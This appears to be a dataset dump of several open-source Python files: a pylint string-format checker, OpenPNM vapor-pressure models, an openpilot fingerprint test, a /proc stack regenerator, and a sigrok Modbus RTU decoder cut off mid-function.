code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
# Copyright (c) 2009-2010 Arista Networks, Inc. - James Lingard
# Copyright (c) 2004-2013 LOGILAB S.A. (Paris, FRANCE).
# Copyright 2012 Google Inc.
#
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""Checker for string formatting operations.
"""
import sys
import tokenize
import astroid
from pylint.interfaces import ITokenChecker, IAstroidChecker, IRawChecker
from pylint.checkers import BaseChecker, BaseTokenChecker
from pylint.checkers import utils
from pylint.checkers.utils import check_messages
_PY3K = sys.version_info >= (3, 0)
MSGS = {
'E1300': ("Unsupported format character %r (%#02x) at index %d",
"bad-format-character",
"Used when a unsupported format character is used in a format\
string."),
'E1301': ("Format string ends in middle of conversion specifier",
"truncated-format-string",
"Used when a format string terminates before the end of a \
conversion specifier."),
'E1302': ("Mixing named and unnamed conversion specifiers in format string",
"mixed-format-string",
"Used when a format string contains both named (e.g. '%(foo)d') \
and unnamed (e.g. '%d') conversion specifiers. This is also \
used when a named conversion specifier contains * for the \
minimum field width and/or precision."),
'E1303': ("Expected mapping for format string, not %s",
"format-needs-mapping",
"Used when a format string that uses named conversion specifiers \
is used with an argument that is not a mapping."),
'W1300': ("Format string dictionary key should be a string, not %s",
"bad-format-string-key",
"Used when a format string that uses named conversion specifiers \
is used with a dictionary whose keys are not all strings."),
'W1301': ("Unused key %r in format string dictionary",
"unused-format-string-key",
"Used when a format string that uses named conversion specifiers \
is used with a dictionary that conWtains keys not required by the \
format string."),
'E1304': ("Missing key %r in format string dictionary",
"missing-format-string-key",
"Used when a format string that uses named conversion specifiers \
is used with a dictionary that doesn't contain all the keys \
required by the format string."),
'E1305': ("Too many arguments for format string",
"too-many-format-args",
"Used when a format string that uses unnamed conversion \
specifiers is given too many arguments."),
'E1306': ("Not enough arguments for format string",
"too-few-format-args",
"Used when a format string that uses unnamed conversion \
specifiers is given too few arguments"),
}
OTHER_NODES = (astroid.Const, astroid.List, astroid.Backquote,
astroid.Lambda, astroid.Function,
astroid.ListComp, astroid.SetComp, astroid.GenExpr)
class StringFormatChecker(BaseChecker):
"""Checks string formatting operations to ensure that the format string
is valid and the arguments match the format string.
"""
__implements__ = (IAstroidChecker,)
name = 'string'
msgs = MSGS
@check_messages(*(MSGS.keys()))
def visit_binop(self, node):
if node.op != '%':
return
left = node.left
args = node.right
if not (isinstance(left, astroid.Const)
and isinstance(left.value, basestring)):
return
format_string = left.value
try:
required_keys, required_num_args = \
utils.parse_format_string(format_string)
except utils.UnsupportedFormatCharacter, e:
c = format_string[e.index]
self.add_message('bad-format-character', node=node, args=(c, ord(c), e.index))
return
except utils.IncompleteFormatString:
self.add_message('truncated-format-string', node=node)
return
if required_keys and required_num_args:
# The format string uses both named and unnamed format
# specifiers.
self.add_message('mixed-format-string', node=node)
elif required_keys:
# The format string uses only named format specifiers.
# Check that the RHS of the % operator is a mapping object
# that contains precisely the set of keys required by the
# format string.
if isinstance(args, astroid.Dict):
keys = set()
unknown_keys = False
for k, _ in args.items:
if isinstance(k, astroid.Const):
key = k.value
if isinstance(key, basestring):
keys.add(key)
else:
self.add_message('bad-format-string-key', node=node, args=key)
else:
# One of the keys was something other than a
# constant. Since we can't tell what it is,
# supress checks for missing keys in the
# dictionary.
unknown_keys = True
if not unknown_keys:
for key in required_keys:
if key not in keys:
self.add_message('missing-format-string-key', node=node, args=key)
for key in keys:
if key not in required_keys:
self.add_message('unused-format-string-key', node=node, args=key)
elif isinstance(args, OTHER_NODES + (astroid.Tuple,)):
type_name = type(args).__name__
self.add_message('format-needs-mapping', node=node, args=type_name)
# else:
# The RHS of the format specifier is a name or
# expression. It may be a mapping object, so
# there's nothing we can check.
else:
# The format string uses only unnamed format specifiers.
# Check that the number of arguments passed to the RHS of
# the % operator matches the number required by the format
# string.
if isinstance(args, astroid.Tuple):
num_args = len(args.elts)
elif isinstance(args, OTHER_NODES + (astroid.Dict, astroid.DictComp)):
num_args = 1
else:
# The RHS of the format specifier is a name or
# expression. It could be a tuple of unknown size, so
# there's nothing we can check.
num_args = None
if num_args is not None:
if num_args > required_num_args:
self.add_message('too-many-format-args', node=node)
elif num_args < required_num_args:
self.add_message('too-few-format-args', node=node)
class StringMethodsChecker(BaseChecker):
__implements__ = (IAstroidChecker,)
name = 'string'
msgs = {
'E1310': ("Suspicious argument in %s.%s call",
"bad-str-strip-call",
"The argument to a str.{l,r,}strip call contains a"
" duplicate character, "),
}
@check_messages(*(MSGS.keys()))
def visit_callfunc(self, node):
func = utils.safe_infer(node.func)
if (isinstance(func, astroid.BoundMethod)
and isinstance(func.bound, astroid.Instance)
and func.bound.name in ('str', 'unicode', 'bytes')
and func.name in ('strip', 'lstrip', 'rstrip')
and node.args):
arg = utils.safe_infer(node.args[0])
if not isinstance(arg, astroid.Const):
return
if len(arg.value) != len(set(arg.value)):
self.add_message('bad-str-strip-call', node=node,
args=(func.bound.name, func.name))
class StringConstantChecker(BaseTokenChecker):
"""Check string literals"""
__implements__ = (ITokenChecker, IRawChecker)
name = 'string_constant'
msgs = {
'W1401': ('Anomalous backslash in string: \'%s\'. '
'String constant might be missing an r prefix.',
'anomalous-backslash-in-string',
'Used when a backslash is in a literal string but not as an '
'escape.'),
'W1402': ('Anomalous Unicode escape in byte string: \'%s\'. '
'String constant might be missing an r or u prefix.',
'anomalous-unicode-escape-in-string',
'Used when an escape like \\u is encountered in a byte '
'string where it has no effect.'),
}
# Characters that have a special meaning after a backslash in either
# Unicode or byte strings.
ESCAPE_CHARACTERS = 'abfnrtvx\n\r\t\\\'\"01234567'
# TODO(mbp): Octal characters are quite an edge case today; people may
# prefer a separate warning where they occur. \0 should be allowed.
# Characters that have a special meaning after a backslash but only in
# Unicode strings.
UNICODE_ESCAPE_CHARACTERS = 'uUN'
def process_module(self, module):
self._unicode_literals = 'unicode_literals' in module.future_imports
def process_tokens(self, tokens):
for (tok_type, token, (start_row, start_col), _, _) in tokens:
if tok_type == tokenize.STRING:
# 'token' is the whole un-parsed token; we can look at the start
# of it to see whether it's a raw or unicode string etc.
self.process_string_token(token, start_row, start_col)
def process_string_token(self, token, start_row, start_col):
for i, c in enumerate(token):
if c in '\'\"':
quote_char = c
break
prefix = token[:i].lower() # markers like u, b, r.
after_prefix = token[i:]
if after_prefix[:3] == after_prefix[-3:] == 3 * quote_char:
string_body = after_prefix[3:-3]
else:
string_body = after_prefix[1:-1] # Chop off quotes
# No special checks on raw strings at the moment.
if 'r' not in prefix:
self.process_non_raw_string_token(prefix, string_body,
start_row, start_col)
def process_non_raw_string_token(self, prefix, string_body, start_row,
start_col):
"""check for bad escapes in a non-raw string.
prefix: lowercase string of eg 'ur' string prefix markers.
string_body: the un-parsed body of the string, not including the quote
marks.
start_row: integer line number in the source.
start_col: integer column number in the source.
"""
# Walk through the string; if we see a backslash then escape the next
# character, and skip over it. If we see a non-escaped character,
# alert, and continue.
#
# Accept a backslash when it escapes a backslash, or a quote, or
# end-of-line, or one of the letters that introduce a special escape
# sequence <http://docs.python.org/reference/lexical_analysis.html>
#
# TODO(mbp): Maybe give a separate warning about the rarely-used
# \a \b \v \f?
#
# TODO(mbp): We could give the column of the problem character, but
# add_message doesn't seem to have a way to pass it through at present.
i = 0
while True:
i = string_body.find('\\', i)
if i == -1:
break
# There must be a next character; having a backslash at the end
# of the string would be a SyntaxError.
next_char = string_body[i+1]
match = string_body[i:i+2]
if next_char in self.UNICODE_ESCAPE_CHARACTERS:
if 'u' in prefix:
pass
elif (_PY3K or self._unicode_literals) and 'b' not in prefix:
pass # unicode by default
else:
self.add_message('anomalous-unicode-escape-in-string',
line=start_row, args=(match, ))
elif next_char not in self.ESCAPE_CHARACTERS:
self.add_message('anomalous-backslash-in-string',
line=start_row, args=(match, ))
# Whether it was a valid escape or not, backslash followed by
# another character can always be consumed whole: the second
# character can never be the start of a new backslash escape.
i += 2
def register(linter):
"""required method to auto register this checker """
linter.register_checker(StringFormatChecker(linter))
linter.register_checker(StringMethodsChecker(linter))
linter.register_checker(StringConstantChecker(linter))
|
hkupty/python-mode
|
pymode/libs/pylama/lint/pylama_pylint/pylint/checkers/strings.py
|
Python
|
lgpl-3.0
| 13,864
|
# -*- coding: utf-8 -*-
r"""
===============================================================================
Submodule -- vapor_pressure
===============================================================================
Methods for predicing the vapor pressure of pure species
"""
import scipy as sp
def antoine(phase, A, B, C, pore_temperature='pore.temperature', **kwargs):
r"""
Uses Antoine equation [1]_ to estimate vapor pressure of a pure component
Parameters
----------
A, B, C : scalars
Antoine vapor pressure coefficients for pure compounds. Since virtually
all Antoine coefficients are reported for units of mmHg and C for
historical reaons, this method assumes these A, B and C values are for
mmHg and C, but converts all properties internally to returrn Pascals.
pore_temperature : string
The dictionary key containing the phase temperature values in Kelvin
[K]
[1] Antoine, C. (1888), Vapor Pressure: a new relationship between pressure
and temperature, Comptes Rendus des Séances de l'Académie des Sciences
(in French) 107: 681–684, 778–780, 836–837
"""
T = phase[pore_temperature] - 273.15
value = (10**(A-B/(C+T)))/760*101325
return value
def water(phase,
pore_temperature='pore.temperature',
pore_salinity='pore.salinity',
**kwargs):
r"""
Calculates vapor pressure of pure water or seawater given by [1]_ based on
Raoult's law. The pure water vapor pressure is given by [2]_
Parameters
----------
pore_temperature : strings
The dictionary key containing the phase temperature values
pore_salinity : strings
The dictionary key containing the phase salinity values
Returns
-------
The vapor pressure of water/seawater in [Pa]
Notes
-----
T must be in K, and S in g of salt per kg of phase, or ppt (parts per
thousand)
VALIDITY: 273 < T < 473 K; 0 < S < 240 g/kg;
ACCURACY: 0.5 %
References
----------
[1] Sharqawy M. H., Lienhard J. H., and Zubair, S. M., Desalination and
Water Treatment, 2010.
[2] ASHRAE handbook: Fundamentals, ASHRAE; 2005.
"""
T = phase[pore_temperature]
try:
S = phase[pore_salinity]
except:
S = 0
a1 = -5.8002206E+03
a2 = 1.3914993E+00
a3 = -4.8640239E-02
a4 = 4.1764768E-05
a5 = -1.4452093E-08
a6 = 6.5459673E+00
Pv_w = sp.exp((a1/T) + a2 + a3*T + a4*T**2 + a5*T**3 + a6*sp.log(T))
Pv_sw = Pv_w/(1+0.57357*(S/(1000-S)))
value = Pv_sw
return value
|
amdouglas/OpenPNM
|
OpenPNM/Phases/models/vapor_pressure.py
|
Python
|
mit
| 2,624
|
#!/usr/bin/env python3
import os
import sys
from typing import Dict, List
from common.basedir import BASEDIR
# messages reserved for CAN based ignition (see can_ignition_hook function in panda/board/drivers/can)
# (addr, len)
CAN_IGNITION_MSGS = {
'gm': [(0x1F1, 8), (0x160, 5)],
#'tesla' : [(0x348, 8)],
}
def _get_fingerprints():
# read all the folders in selfdrive/car and return a dict where:
# - keys are all the car names that which we have a fingerprint dict for
# - values are dicts of fingeprints for each trim
fingerprints = {}
for car_folder in [x[0] for x in os.walk(BASEDIR + '/selfdrive/car')]:
car_name = car_folder.split('/')[-1]
try:
fingerprints[car_name] = __import__(f'selfdrive.car.{car_name}.values', fromlist=['FINGERPRINTS']).FINGERPRINTS
except (ImportError, OSError, AttributeError):
pass
return fingerprints
def check_fingerprint_consistency(f1, f2):
# return false if it finds a fingerprint fully included in another
# max message worth checking is 1800, as above that they usually come too infrequently and not
# usable for fingerprinting
max_msg = 1800
is_f1_in_f2 = True
for k in f1:
if (k not in f2 or f1[k] != f2[k]) and k < max_msg:
is_f1_in_f2 = False
is_f2_in_f1 = True
for k in f2:
if (k not in f1 or f2[k] != f1[k]) and k < max_msg:
is_f2_in_f1 = False
return not is_f1_in_f2 and not is_f2_in_f1
def check_can_ignition_conflicts(fingerprints, brands):
# loops through all the fingerprints and exits if CAN ignition dedicated messages
# are found in unexpected fingerprints
for brand_can, msgs_can in CAN_IGNITION_MSGS.items():
for i, f in enumerate(fingerprints):
for msg_can in msgs_can:
if brand_can != brands[i] and msg_can[0] in f and msg_can[1] == f[msg_can[0]]:
print("CAN ignition dedicated msg %d with len %d found in %s fingerprints!" % (msg_can[0], msg_can[1], brands[i]))
print("TEST FAILED")
sys.exit(1)
if __name__ == "__main__":
fingerprints = _get_fingerprints()
fingerprints_flat: List[Dict] = []
car_names = []
brand_names = []
for brand in fingerprints:
for car in fingerprints[brand]:
fingerprints_flat += fingerprints[brand][car]
for i in range(len(fingerprints[brand][car])):
car_names.append(car)
brand_names.append(brand)
# first check if CAN ignition specific messages are unexpectedly included in other fingerprints
check_can_ignition_conflicts(fingerprints_flat, brand_names)
valid = True
for idx1, f1 in enumerate(fingerprints_flat):
for idx2, f2 in enumerate(fingerprints_flat):
if idx1 < idx2 and not check_fingerprint_consistency(f1, f2):
valid = False
print(f"Those two fingerprints are inconsistent {car_names[idx1]} {car_names[idx2]}")
print("")
print(', '.join("%d: %d" % v for v in sorted(f1.items())))
print("")
print(', '.join("%d: %d" % v for v in sorted(f2.items())))
print("")
print(f"Found {len(fingerprints_flat)} individual fingerprints")
if not valid or len(fingerprints_flat) == 0:
print("TEST FAILED")
sys.exit(1)
else:
print("TEST SUCESSFUL")
|
commaai/openpilot
|
selfdrive/test/test_fingerprints.py
|
Python
|
mit
| 3,216
|
#!/usr/bin/env python
"""Handle records from /proc/self/stack data files"""
import regentest as RG
import ProcHandlers as PH
PFC = PH.ProcFieldConstants
# ---
def re_self_stack(inprecs):
"""Iterate through parsed records and re-generate data file"""
__template = "[<{addr:016x}>] {entry:s}"
for __hilit in inprecs:
__ff = inprecs.field
print __template.format(addr=__ff[PFC.F_ADDRESS],
entry=__ff[PFC.F_STACK_ENTRY])
#...+....1....+....2....+....3....+....4....+....5....+....6....+....7....+....8
RG.RECREATOR[PH.GET_HANDLER("/proc/self/stack")] = re_self_stack
|
cnamejj/PyProc
|
regentest/self_stack.py
|
Python
|
gpl-2.0
| 619
|
##
## This file is part of the libsigrokdecode project.
##
## Copyright (C) 2015 Bart de Waal <bart@waalamo.com>
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, see <http://www.gnu.org/licenses/>.
##
import sigrokdecode as srd
from math import ceil
RX = 0
TX = 1
rxtx_channels = ('RX', 'TX')
class No_more_data(Exception):
'''This exception is a signal that we should stop parsing an ADU as there
is no more data to parse.'''
pass
class Data:
'''The Data class is used to hold the bytes from the serial decode.'''
def __init__(self, start, end, data):
self.start = start
self.end = end
self.data = data
class Modbus_ADU:
'''An Application Data Unit is what Modbus calls one message.
Protocol decoders are supposed to keep track of state and then provide
decoded data to the backend as it reads it. In Modbus' case, the state is
the ADU up to that point. This class represents the state and writes the
messages to the backend.
This class is for the common infrastructure between CS and SC. It should
not be used directly, only inhereted from.'''
def __init__(self, parent, start, write_channel, annotation_prefix):
self.data = [] # List of all the data received up to now
self.parent = parent # Reference to the decoder object
self.start = start
self.last_read = start # The last moment parsed by this ADU object
self.write_channel = write_channel
self.last_byte_put = -1
self.annotation_prefix = annotation_prefix
# Any Modbus message needs to be at least 4 bytes long. The Modbus
# function may make this longer.
self.minimum_length = 4
# This variable is used by an external function to determine when the
# next frame should be started.
self.startNewFrame = False
# If there is an error in a frame, we'd like to highlight it. Keep
# track of errors.
self.hasError = False
def add_data(self, start, end, data):
'''Let the frame handle another piece of data.
start: start of this data
end: end of this data
data: data as received from the UART decoder'''
ptype, rxtx, pdata = data
self.last_read = end
if ptype == 'DATA':
self.data.append(Data(start, end, pdata[0]))
self.parse() # parse() is defined in the specific type of ADU.
def puti(self, byte_to_put, annotation, message):
'''This class keeps track of how much of the data has already been
annotated. This function tells the parent class to write message, but
only if it hasn't written about this bit before.
byte_to_put: Only write if it hasn't yet written byte_to_put. It will
write from the start of self.last_byte_put+1 to the end
of byte_to_put.
annotation: Annotation to write to, without annotation_prefix.
message: Message to write.'''
if byte_to_put > len(self.data) - 1:
# If the byte_to_put hasn't been read yet.
raise No_more_data
if annotation == 'error':
self.hasError = True
if byte_to_put > self.last_byte_put:
self.parent.puta(
self.data[self.last_byte_put + 1].start,
self.data[byte_to_put].end,
self.annotation_prefix + annotation,
message)
self.last_byte_put = byte_to_put
raise No_more_data
def putl(self, annotation, message, maximum=None):
'''Puts the last byte on the stack with message. The contents of the
last byte will be applied to message using format.'''
last_byte_address = len(self.data) - 1
if maximum is not None and last_byte_address > maximum:
return
self.puti(last_byte_address, annotation,
message.format(self.data[-1].data))
def close(self, message_overflow):
'''Function to be called when next message is started. As there is
always space between one message and the next, we can use that space
for errors at the end.'''
# TODO: Figure out how to make this happen for last message.
data = self.data
if len(data) < self.minimum_length:
if len(data) == 0:
# Sometimes happens with noise, safe to ignore.
return
self.parent.puta(
data[self.last_byte_put].end, message_overflow,
self.annotation_prefix + 'error',
'Message too short or not finished')
self.hasError = True
if self.hasError and self.parent.options['scchannel'] != self.parent.options['cschannel']:
# If we are decoding different channels (so client->server and
# server->client messages can be separated) we like to mark blocks
# containing errors. We don't do this when decoding the same
# channel as both a client->server and server->client frame, and
# one of those is bound to contain an error, making highlighting
# frames useless.
self.parent.puta(data[0].start, data[-1].end,
'error-indication', 'Frame contains error')
if len(data) > 256:
try:
self.puti(len(data) - 1, 'error',
'Modbus data frames are limited to 256 bytes')
except No_more_data:
pass
def check_crc(self, byte_to_put):
'''Check the CRC code, data[byte_to_put] is the 2nd byte of the CRC.'''
crc_byte1, crc_byte2 = self.calc_crc(byte_to_put)
data = self.data
if data[-2].data == crc_byte1 and data[-1].data == crc_byte2:
self.puti(byte_to_put, 'crc', 'CRC correct')
else:
self.puti(byte_to_put, 'error',
'CRC should be {} {}'.format(crc_byte1, crc_byte2))
def half_word(self, start):
'''Return the half word (16 bit) value starting at start bytes in. If
it goes out of range it raises the usual errors.'''
if (start + 1) > (len(self.data) - 1):
# If there isn't enough length to access data[start + 1].
raise No_more_data
return self.data[start].data * 0x100 + self.data[start + 1].data
def calc_crc(self, last_byte):
'''Calculate the CRC, as described in the spec.
The last byte of the CRC should be data[last_byte].'''
if last_byte < 3:
# Every Modbus ADU should be as least 4 long, so we should never
# have to calculate a CRC on something shorter.
raise Exception('Could not calculate CRC: message too short')
result = 0xFFFF
magic_number = 0xA001 # As defined in the modbus specification.
for byte in self.data[:last_byte - 1]:
result = result ^ byte.data
for i in range(8):
LSB = result & 1
result = result >> 1
if (LSB): # If the LSB is true.
result = result ^ magic_number
byte1 = result & 0xFF
byte2 = (result & 0xFF00) >> 8
return (byte1, byte2)
def parse_write_single_coil(self):
'''Parse function 5, write single coil.'''
self.minimum_length = 8
self.puti(1, 'function', 'Function 5: Write Single Coil')
address = self.half_word(2)
self.puti(3, 'address',
'Address 0x{:X} / {:d}'.format(address, address + 10000))
raw_value = self.half_word(4)
value = 'Invalid Coil Value'
if raw_value == 0x0000:
value = 'Coil Value OFF'
elif raw_value == 0xFF00:
value = 'Coil Value ON'
self.puti(5, 'data', value)
self.check_crc(7)
def parse_write_single_register(self):
'''Parse function 6, write single register.'''
self.minimum_length = 8
self.puti(1, 'function', 'Function 6: Write Single Register')
address = self.half_word(2)
self.puti(3, 'address',
'Address 0x{:X} / {:d}'.format(address, address + 30000))
value = self.half_word(4)
value_formatted = 'Register Value 0x{0:X} / {0:d}'.format(value)
self.puti(5, 'data', value_formatted)
self.check_crc(7)
def parse_diagnostics(self):
'''Parse function 8, diagnostics. This function has many subfunctions,
but they are all more or less the same.'''
self.minimum_length = 8
self.puti(1, 'function', 'Function 8: Diagnostics')
diag_subfunction = {
0: 'Return Query data',
1: 'Restart Communications Option',
2: 'Return Diagnostics Register',
3: 'Change ASCII Input Delimiter',
4: 'Force Listen Only Mode',
10: 'Clear Counters and Diagnostic Register',
11: 'Return Bus Message Count',
12: 'Return Bus Communication Error Count',
13: 'Return Bus Exception Error Count',
14: 'Return Slave Message Count',
15: 'Return Slave No Response Count',
16: 'Return Slave NAK Count',
17: 'Return Slave Busy Count',
18: 'Return Bus Character Overrun Count',
20: 'Return Overrun Counter and Flag',
}
subfunction = self.half_word(2)
subfunction_name = diag_subfunction.get(subfunction,
'Reserved subfunction')
self.puti(3, 'data',
'Subfunction {}: {}'.format(subfunction, subfunction_name))
diagnostic_data = self.half_word(4)
self.puti(5, 'data',
'Data Field: {0} / 0x{0:04X}'.format(diagnostic_data))
self.check_crc(7)
def parse_mask_write_register(self):
'''Parse function 22, Mask Write Register.'''
self.minimum_length = 10
data = self.data
self.puti(1, 'function', 'Function 22: Mask Write Register')
address = self.half_word(2)
self.puti(3, 'address',
'Address 0x{:X} / {:d}'.format(address, address + 30001))
self.half_word(4) # To make sure we don't oveflow data.
and_mask_1 = data[4].data
and_mask_2 = data[5].data
self.puti(5, 'data',
'AND mask: {:08b} {:08b}'.format(and_mask_1, and_mask_2))
self.half_word(6) # To make sure we don't oveflow data.
or_mask_1 = data[6].data
or_mask_2 = data[7].data
self.puti(7, 'data',
'OR mask: {:08b} {:08b}'.format(or_mask_1, or_mask_2))
self.check_crc(9)
def parse_not_implemented(self):
'''Explicitly mark certain functions as legal functions, but not
implemented in this parser. This is due to the author not being able to
find anything (hardware or software) that supports these functions.'''
# TODO: Implement these functions.
# Mentioning what function it is is no problem.
function = self.data[1].data
functionname = {
20: 'Read File Record',
21: 'Write File Record',
24: 'Read FIFO Queue',
43: 'Read Device Identification/Encapsulated Interface Transport',
}[function]
self.puti(1, 'function',
'Function {}: {} (not supported)'.format(function, functionname))
# From there on out we can keep marking it unsupported.
self.putl('data', 'This function is not currently supported')
class Modbus_ADU_SC(Modbus_ADU):
'''SC stands for Server -> Client.'''
def parse(self):
'''Select which specific Modbus function we should parse.'''
data = self.data
# This try-catch is being used as flow control.
try:
server_id = data[0].data
if 1 <= server_id <= 247:
message = 'Slave ID: {}'.format(server_id)
else:
message = 'Slave ID {} is invalid'
self.puti(0, 'server-id', message)
function = data[1].data
if function == 1 or function == 2:
self.parse_read_bits()
elif function == 3 or function == 4 or function == 23:
self.parse_read_registers()
elif function == 5:
self.parse_write_single_coil()
elif function == 6:
self.parse_write_single_register()
elif function == 7:
self.parse_read_exception_status()
elif function == 8:
self.parse_diagnostics()
elif function == 11:
self.parse_get_comm_event_counter()
elif function == 12:
self.parse_get_comm_event_log()
elif function == 15 or function == 16:
self.parse_write_multiple()
elif function == 17:
self.parse_report_server_id()
elif function == 22:
self.parse_mask_write_register()
elif function in {21, 21, 24, 43}:
self.parse_not_implemented()
elif function > 0x80:
self.parse_error()
else:
self.puti(1, 'error',
'Unknown function: {}'.format(data[1].data))
self.putl('error', 'Unknown function')
# If the message gets here without raising an exception, the
# message goes on longer than it should.
self.putl('error', 'Message too long')
except No_more_data:
# Just a message saying we don't need to parse anymore this round.
pass
def parse_read_bits(self):
self.mimumum_length = 5
data = self.data
function = data[1].data
if function == 1:
self.puti(1, 'function', 'Function 1: Read Coils')
else:
self.puti(1, 'function', 'Function 2: Read Discrete Inputs')
bytecount = self.data[2].data
self.minimum_length = 5 + bytecount # 3 before data, 2 CRC.
self.puti(2, 'length', 'Byte count: {}'.format(bytecount))
# From here on out, we expect registers on 3 and 4, 5 and 6 etc.
# So registers never start when the length is even.
self.putl('data', '{:08b}', bytecount + 2)
self.check_crc(bytecount + 4)
def parse_read_registers(self):
self.mimumum_length = 5
data = self.data
function = data[1].data
if function == 3:
self.puti(1, 'function', 'Function 3: Read Holding Registers')
elif function == 4:
self.puti(1, 'function', 'Function 4: Read Input Registers')
elif function == 23:
self.puti(1, 'function', 'Function 23: Read/Write Multiple Registers')
bytecount = self.data[2].data
self.minimum_length = 5 + bytecount # 3 before data, 2 CRC.
if bytecount % 2 == 0:
self.puti(2, 'length', 'Byte count: {}'.format(bytecount))
else:
self.puti(2, 'error',
'Error: Odd byte count ({})'.format(bytecount))
# From here on out, we expect registers on 3 and 4, 5 and 6 etc.
# So registers never start when the length is even.
if len(data) % 2 == 1:
register_value = self.half_word(-2)
self.putl('data', '0x{0:04X} / {0}'.format(register_value),
bytecount + 2)
else:
raise No_more_data
self.check_crc(bytecount + 4)
def parse_read_exception_status(self):
self.mimumum_length = 5
self.puti(1, 'function', 'Function 7: Read Exception Status')
exception_status = self.data[2].data
self.puti(2, 'data',
'Exception status: {:08b}'.format(exception_status))
self.check_crc(4)
def parse_get_comm_event_counter(self):
self.mimumum_length = 8
self.puti(1, 'function', 'Function 11: Get Comm Event Counter')
status = self.half_word(2)
if status == 0x0000:
self.puti(3, 'data', 'Status: not busy')
elif status == 0xFFFF:
self.puti(3, 'data', 'Status: busy')
else:
self.puti(3, 'error', 'Bad status: 0x{:04X}'.format(status))
count = self.half_word(4)
self.puti(5, 'data', 'Event Count: {}'.format(count))
self.check_crc(7)
def parse_get_comm_event_log(self):
self.mimumum_length = 11
self.puti(1, 'function', 'Function 12: Get Comm Event Log')
data = self.data
bytecount = data[2].data
self.puti(2, 'length', 'Bytecount: {}'.format(bytecount))
# The bytecount is the length of everything except the slaveID,
# function code, bytecount and CRC.
self.mimumum_length = 5 + bytecount
status = self.half_word(3)
if status == 0x0000:
self.puti(4, 'data', 'Status: not busy')
elif status == 0xFFFF:
self.puti(4, 'data', 'Status: busy')
else:
self.puti(4, 'error', 'Bad status: 0x{:04X}'.format(status))
event_count = self.half_word(5)
self.puti(6, 'data', 'Event Count: {}'.format(event_count))
message_count = self.half_word(7)
self.puti(8, 'data', 'Message Count: {}'.format(message_count))
self.putl('data', 'Event: 0x{:02X}'.format(data[-1].data),
bytecount + 2)
self.check_crc(bytecount + 4)
def parse_write_multiple(self):
'''Function 15 and 16 are almost the same, so we can parse them both
using one function.'''
self.mimumum_length = 8
function = self.data[1].data
if function == 15:
data_unit = 'Coils'
max_outputs = 0x07B0
long_address_offset = 10001
elif function == 16:
data_unit = 'Registers'
max_outputs = 0x007B
long_address_offset = 30001
self.puti(1, 'function',
'Function {}: Write Multiple {}'.format(function, data_unit))
starting_address = self.half_word(2)
# Some instruction manuals use a long form name for addresses, this is
# listed here for convienience.
address_name = long_address_offset + starting_address
self.puti(3, 'address',
'Start at address 0x{:X} / {:d}'.format(starting_address,
address_name))
quantity_of_outputs = self.half_word(4)
if quantity_of_outputs <= max_outputs:
self.puti(5, 'data',
'Write {} {}'.format(quantity_of_outputs, data_unit))
else:
self.puti(5, 'error',
'Bad value: {} {}. Max is {}'.format(quantity_of_outputs,
data_unit, max_outputs))
self.check_crc(7)
def parse_report_server_id(self):
# Buildup of this function:
# 1 byte serverID
# 1 byte function (17)
# 1 byte bytecount
# 1 byte serverID (counts for bytecount)
# 1 byte Run Indicator Status (counts for bytecount)
# bytecount - 2 bytes of device specific data (counts for bytecount)
# 2 bytes of CRC
self.mimumum_length = 7
data = self.data
self.puti(1, 'function', 'Function 17: Report Server ID')
bytecount = data[2].data
self.puti(2, 'length', 'Data is {} bytes long'.format(bytecount))
self.puti(3, 'data', 'serverID: {}'.format(data[3].data))
run_indicator_status = data[4].data
if run_indicator_status == 0x00:
self.puti(4, 'data', 'Run Indicator status: Off')
elif run_indicator_status == 0xFF:
self.puti(4, 'data', 'Run Indicator status: On')
else:
self.puti(4, 'error',
'Bad Run Indicator status: 0x{:X}'.format(run_indicator_status))
self.putl('data', 'Device specific data: {}, "{}"'.format(data[-1].data,
chr(data[-1].data)), 2 + bytecount)
self.check_crc(4 + bytecount)
def parse_error(self):
'''Parse a Modbus error message.'''
self.mimumum_length = 5
# The function code of an error is always 0x80 above the function call
# that caused it.
functioncode = self.data[1].data - 0x80
functions = {
1: 'Read Coils',
2: 'Read Discrete Inputs',
3: 'Read Holding Registers',
4: 'Read Input Registers',
5: 'Write Single Coil',
6: 'Write Single Register',
7: 'Read Exception Status',
8: 'Diagnostic',
11: 'Get Com Event Counter',
12: 'Get Com Event Log',
15: 'Write Multiple Coils',
16: 'Write Multiple Registers',
17: 'Report Slave ID',
20: 'Read File Record',
21: 'Write File Record',
22: 'Mask Write Register',
23: 'Read/Write Multiple Registers',
24: 'Read FIFO Queue',
43: 'Read Device Identification/Encapsulated Interface Transport',
}
functionname = '{}: {}'.format(functioncode,
functions.get(functioncode, 'Unknown function'))
self.puti(1, 'function',
'Error for function {}'.format(functionname))
error = self.data[2].data
errorcodes = {
1: 'Illegal Function',
2: 'Illegal Data Address',
3: 'Illegal Data Value',
4: 'Slave Device Failure',
5: 'Acknowledge',
6: 'Slave Device Busy',
8: 'Memory Parity Error',
10: 'Gateway Path Unavailable',
11: 'Gateway Target Device failed to respond',
}
errorname = '{}: {}'.format(error, errorcodes.get(error, 'Unknown'))
self.puti(2, 'data', 'Error {}'.format(errorname))
self.check_crc(4)
class Modbus_ADU_CS(Modbus_ADU):
'''CS stands for Client -> Server.'''
def parse(self):
'''Select which specific Modbus function we should parse.'''
data = self.data
# This try-catch is being used as flow control.
try:
server_id = data[0].data
message = ''
if server_id == 0:
message = 'Broadcast message'
elif 1 <= server_id <= 247:
message = 'Slave ID: {}'.format(server_id)
elif 248 <= server_id <= 255:
message = 'Slave ID: {} (reserved address)'.format(server_id)
